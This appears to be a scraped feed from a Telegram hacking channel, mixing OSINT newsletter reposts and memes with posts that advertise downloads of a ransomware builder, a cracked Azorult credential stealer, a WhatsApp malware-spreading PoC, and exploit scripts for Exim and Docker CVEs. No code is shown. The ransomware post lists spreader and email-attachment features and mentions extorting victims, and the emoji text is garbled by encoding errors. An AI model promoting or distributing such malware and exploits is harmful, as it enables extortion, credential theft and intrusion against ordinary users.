CrackCodes ๐Ÿ‡ฎ๐Ÿ‡ณ
15.9K subscribers
1.89K photos
387 videos
722 files
3.67K links
Official Websites: https://crackcodes.in |
For Bug Hunters: https://system32.ink

Admin: @MynK0x00
About Admin: prapattimynk.crackcodes.in


Be Secure~
เคœเคฏ เคถเฅเคฐเฅ€ เคฐเคพเคฎ
Download Telegram
Forwarded from OSINT AMBITION (Dheeraj Yadav)
Wednesday Updates #6 is out now.

Highlights: 10 blogs, 8 external reading, 4 videos, 2 podcast episodes, 2 new events, 4 tool updates, 4 awesome tools, a resource collection and many more.

๐Ÿ”— https://osintambition.substack.com/p/wednesday-updates-6

Don't forget to subscribe to get all new posts directly in your inbox. #osint #osintforgood #socmint #osinttools #osintnews #weeklyupdate
๐Ÿ”ฅ2
Forwarded from ๐™‡๐™ค๐™จ๐™ฉ๐™จ๐™š๐™˜
today i just searched coffinxp on google and get so many good results i dont know i am mentioned in everywhere โค๏ธjust type coffinxp or you can also type lostsec for same very good SEO on google..
check out some results i don't know this but after google i get some results thnq all who mentioned me โค๏ธ๐Ÿ˜‡

https://medium.com/@tom.sh/best-bug-hunting-methodology-for-ez-money-58b7fe928e6f

https://www.linkedin.com/posts/ethan-quinn-11621a238_bugbounty-pentesting-cybersecurity-activity-7201326813971693568-I_nE?utm_source=share&utm_medium=member_android

https://combot.org/stickers/coffin3

https://system32.in/topic/bug-hunting-methodology/

https://communityin.oppo.com/thread/1608156645420957702
๐Ÿ˜’ A Hacker Story About How He Hacked Anki,The ๐Ÿ›Ÿ World's Most Popular ๐ŸฉนFlashcard App


โ—๏ธIntro: It took him 10 days to go from โ€œWe think this might be vulnerableโ€ to full-blown remote code execution, including the 7๏ธโƒฃ days we were both on ๐Ÿฟholiday.

๐Ÿ” ๐Ÿ” ๐Ÿ” ๐Ÿ”  Full Blog : Click Here
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from CYBER TRICKS ZONE ๐Ÿ‡ฎ๐Ÿ‡ณ๐Ÿšฉ (๐™‹๐™ง๐™ค๐™ฉ๐™ค๐™˜๐™ค๐™ก ๐™‰๐™ž๐™˜๐™ )
๐Ÿณ CTF chall write-ups, files & scripts.

โ€ข CTF is one of the best methods to acquire the necessary skills in hacking various systems or gain unique knowledge in various aspects of information security.

โ€ข At the link below you can find a very useful repo, which contains current tools, scripts, platforms and video material on completing CTF. Save to favorites and use:

โžก๏ธ https://github.com/Crypto-Cat/CTF
This media is not supported in the widget
VIEW IN TELEGRAM
Forwarded from OSINT AMBITION (Dheeraj | OSINTAmbition)
Hey everyone, our founder has started a newsletter to share his learning about Cybersecurity, OSINT, startups, marketing, sales, money and other topics.

If anyone is interested in reading it, subscribe using the link below.

https://lifelong-learnings.beehiiv.com/

#osint #cybersecurity #marketing #sales #infosec #startups
๐Ÿ” ๐Ÿ” ๐Ÿ” ๐Ÿ” ๐Ÿ” ๐Ÿ” ๐Ÿ”  ๐Ÿ”ฃ https://system32.ink/cve-2024-41110-docker-authz-exploit/

#๏ธโƒฃCVE-2024-41110 Docker AuthZ Exploit๐Ÿšจ


โšก๏ธโœ๏ธMoby is an open-source project created by Docker for software containerization. A security vulnerability has been detected in certain versions of Docker Engine, which could allow an attacker to bypass authorization plugins (AuthZ) under specific circumstances. The base likelihood of this being exploited is low. Using a specially-crafted API request, an Engine API client could make the daemon forward the request or response to an authorization plugin without the body. In certain circumstances, the authorization plugin may allow a request which it would have otherwise denied if the body had been forwarded to it. A security issue was discovered In 2018, where an attacker could bypass AuthZ plugins using a specially crafted API request. This could lead to unauthorized actions, including privilege escalation. Although this issue was fixed in Docker Engine v18.09.1 โ†—๏ธ
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿ‘2
โšก12๐Ÿ‘8โค4
This media is not supported in the widget
VIEW IN TELEGRAM
๐Ÿ—ฟ8๐Ÿ‘1
#meme ๐ŸŠ
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿคฃ8๐Ÿ—ฟ1
๐Ÿ–ฅ ๐Ÿ–ฅ Poku 2.0: A Cross-Platform Test Runner for JSโšก๏ธ

๐Ÿ–ฅPokuโ€™s philosophy is to โ€˜bring the JavaScript essence back to testing.โ€™ It runs the same way across Node, Bun and Deno, and auto-detects ESM, CommonJS and TypeScript.๐Ÿ”ฅ

๐Ÿงถ Link

#js #lib #tests #frontend
#release
Please open Telegram to view this post
VIEW IN TELEGRAM
This media is not supported in your browser
VIEW IN TELEGRAM
โšก๏ธLegends Wrapped In Tiranga๐Ÿ‡ฎ๐Ÿ‡ณ


This โšก๏ธEditz Channel Dedicated To Our โค๏ธ Brave Soldiers (Indian Army ๐Ÿช–)

โญ๏ธPlease โšกSubscribe ๐Ÿ“Œ
https://t.me/abyush13ueu
Please open Telegram to view this post
VIEW IN TELEGRAM
โค10๐Ÿ‘2๐Ÿฅฐ2โšก1๐Ÿ”ฅ1
๐Ÿ–ฅ https://system32.ink/enccn-ransomware-builder/ ๐Ÿ–ฅ

ENCCN Ransomware ๐Ÿ‘ฃ Builder Download


โšก๏ธThe latest edition of this software is beautifully established, that can help you to encrypt documents on the inflamed device. It allows the users to display a message to inform other users that their files are locked.

๐ŸคจCybercriminals can demand a fee from their targets to restore their data, and in this way after they get the fee so it is on them whether they restore the victim's data or not.

โ€‹
๐Ÿ”ฅFeaturesโ€‹๐Ÿ”ฃโž–

There are so many features in the enccn ransomware builder windows 10 software and some of them are as follows below.

1๏ธโƒฃDownload Malware
2๏ธโƒฃFully featured
3๏ธโƒฃMedia library
4๏ธโƒฃExecute the malware
5๏ธโƒฃWindows shortcut exploit
Using reg
6๏ธโƒฃEasy handling
7๏ธโƒฃWindows shortcuts
8๏ธโƒฃRegistry injection
9๏ธโƒฃPremium version
1๏ธโƒฃ0๏ธโƒฃMalicious email attachments
1๏ธโƒฃ1๏ธโƒฃConfiguration
1๏ธโƒฃ2๏ธโƒฃFast
1๏ธโƒฃ3๏ธโƒฃStable
1๏ธโƒฃ4๏ธโƒฃCome with advanced features
1๏ธโƒฃ5๏ธโƒฃSupport all kinds of browsers
1๏ธโƒฃ6๏ธโƒฃGrab information about anyone
1๏ธโƒฃ7๏ธโƒฃMalware maker
1๏ธโƒฃ8๏ธโƒฃEncrypt files
1๏ธโƒฃ9๏ธโƒฃMultiple languages
2๏ธโƒฃ0๏ธโƒฃSpreader
2๏ธโƒฃ1๏ธโƒฃCustomizable
Many more.
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿ‘5โšก3โค2๐Ÿคฃ1๐Ÿพ1
This media is not supported in the widget
VIEW IN TELEGRAM
๐Ÿ‘Œ5๐Ÿ‘1๐Ÿพ1๐Ÿ†’1
๐Ÿ” ๐Ÿ” ๐Ÿ” ๐Ÿ” 0๏ธโƒฃ๐Ÿ” ๐Ÿ” ๐Ÿ”ฃโž–

https://system32.ink/exim-mail-servers-cve-2024-39929-exploit/

๐Ÿ–ฅExim through 4.97.1 misparses a multiline RFC 2231 header filename, and thus remote attackers can bypass a $mime_filename extension-blocking protection mechanism, and potentially deliver executable attachments to the mailboxes of end users. ๐Ÿ–ฅ

๐Ÿฐ EXIM Mail Servers CVE-2024-39929 Exploit ๐Ÿดโ€โ˜ ๏ธ


The ๐Ÿ–ฅscript performs the following actions:

โญ๏ธReads the list of SMTP servers from the specified file.
โญ๏ธPrompts the user for sender and recipient email addresses.
๐ŸšจConnects to each SMTP server on port 25.
๐ŸšจSends an email with a crafted attachment designed to exploit CVE-2024-39929.
#๏ธโƒฃSets the email subject to indicate the server used for sending the email.
#๏ธโƒฃPrints debug information and handles exceptions.
Please open Telegram to view this post
VIEW IN TELEGRAM
๐ŸŽ‰1
This media is not supported in the widget
VIEW IN TELEGRAM
โšก4๐Ÿ‘พ3๐Ÿ‘2
๐Ÿ”ฃ https://system32.ink/fujitsu-network-edgiot-gw1500-m2m-gw-for-fenics-cve-2024-40617-exploit/ ๐Ÿ”ฃ

๐Ÿ–ฅ FUJITSU Network ๐Ÿ–ฅ Edgiot GW1500 ๐Ÿ–ฅ (M2M-GW for FENICS) CVE-2024-40617 Exploit


๐Ÿ–ฅ Path traversal vulnerability exists in FUJITSU Network Edgiot GW1500 (M2M-GW for FENICS). If a remote authenticated ๐Ÿ–ฅ attacker with User Class privilege sends a specially crafted request to the affected product, access restricted files containing sensitive information may be accessed. As a result, Administrator Class privileges of the product may be hijacked.๐Ÿ–ฅ
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from OSINT AMBITION (Dheeraj | OSINTAmbition)
Wednesday Updates #7 is out now.

Highlights: 8 blogs, 5 external readings, 2 videos, 1 podcast episode, 1 new challenge, 2 tool updates, 4 awesome tools, a resource collection, and many more.

https://osintambition.substack.com/p/wednesday-updates-7

Don't forget to subscribe to get all new posts directly in your inbox. #osint #osintforgood #socmint #osinttools #osintnews #weeklyupdate
๐Ÿ–ฅ https://system32.ink/azorult-stealr-3-4-cracked/ ๐Ÿ–ฅ

๐Ÿ–ฅ Azorult Stealr 3.4 Cracked ๐Ÿ–ฅ


๐Ÿ–ฅ Azorult Stealer is a type of malware, specifically an information stealer, designed to gather sensitive information from infected computers. It targets a variety of data, including:

#๏ธโƒฃLogin credentials (usernames and passwords)
#๏ธโƒฃBanking information
โšก๏ธCryptocurrency wallets
โšก๏ธBrowser history
๐Ÿ˜ŽCookies
๐Ÿ˜ŽStored form autofill data
๐ŸชชFiles from the infected machine
Please open Telegram to view this post
VIEW IN TELEGRAM
This media is not supported in your browser
VIEW IN TELEGRAM
๐Ÿ–ฅ ๐Ÿ”ฃ https://system32.ink/whatsapp-extension-manipulation-poc/ ๐Ÿ–ฅ

๐Ÿ“ฑ WhatsApp Extension Manipulation PoC ๐ŸŽฎ


๐Ÿ–ฅ Android malware (.apk) can be spread through a fake PDF ๐Ÿ–ฅ document by manipulating the file extension in the WhatsApp application ๐Ÿ˜ˆ.
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿ‘3